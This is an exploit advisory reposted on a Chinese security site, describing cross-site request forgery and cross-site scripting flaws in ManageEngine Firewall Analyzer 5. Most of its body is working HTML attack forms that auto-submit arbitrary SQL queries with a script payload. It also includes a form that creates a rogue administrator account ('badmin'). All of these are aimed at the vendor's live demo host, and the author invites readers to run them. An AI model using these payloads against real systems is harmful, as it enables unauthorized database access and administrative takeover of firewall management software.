首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ManageEngine Firewall Analyzer 5 XSRF/XSS Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2009-02-02  
Written By Michael Brooks
Special thanks to str0ke!


Product: ManageEngine Firewall Analyzer 5 - XSRF and XSS
Vulerable version:
Build Version  :  	5.0.0
Build Number  :  	5000
Build Date  :  	Apr_25
homepage:
http://fwanalyzer.com/

This is live exploit code against the online demo.   Go ahead,  run it!

With this exploit you can execute any SQL query you want,  this is not
SQL Injection.  I think its funny that the sql query is also
vulnerable to xss.

XSRF to execute Arbatrary SQL Queries.  This is not SQL Injection,
its better because you can execute *any*  query.
<html>
	<form action='http://demo.fwanalyzer.com/fw/runQuery.do' method='POST' id=1>
		<input type=hidden name="execute" value="true" >
		<input type=hidden name="DatabaseType" value="mysql">
		<input type=hidden name="query" value='select
"<script>alert(/0wn3d/)</script>"'>
		<input type=submit>
	</form>
</html>

Create a new administrative account badmin:badmin:
<html>
	<form action='http://demo.fwanalyzer.com/fw/userManagementForm.do'
method='POST' id=2>
		<input type=hidden name='addField' value='true'>
		<input type=hidden name='productName' value='firewall'>
		<input type=hidden name='userType' value='Administrator'>
		<input type=hidden name='licType' value='Prem'>
		<input type=hidden name='userName' value='madmin'>
		<input type=hidden name='pwd1' value='badmin'>
		<input type=hidden name='password' value='badmin'>
		<input type=hidden name='userGroup' value='Administrator'>
		<input type=hidden name='email' value='badmin@badmin.com'>
		<input type=hidden name='availableDevices' value='301'>
		<input type=hidden name='Submit3' value='Add User'>
		<input type=submit>
		</form>
</html>

<script>
	document.getElementById(1).submit();
	//document.getElementById(2).submit();
</script>

# [2009-01-29]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PLE CMS 1.0 beta 4.2 (login.ph
·Profense Web Application Firew
·NetArtMedia Car Portal 1.0 (Au
·D-Link VoIP Phone Adapter XSS/
·Motorola Wimax modem CPEi300 (
·Zoom VoIP Phone Adapater ATA1+
·dBpowerAMP Audio Player v2 (.p
·Pligg 9.9.5 XSRF Protection By
·WFTPD Explorer Pro 1.0 Remote
·Total Video Player 1.3.7 (.m3u
·Internet Explorer 7 ClickJacki
·SalesCart (Auth Bypass) SQL In
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved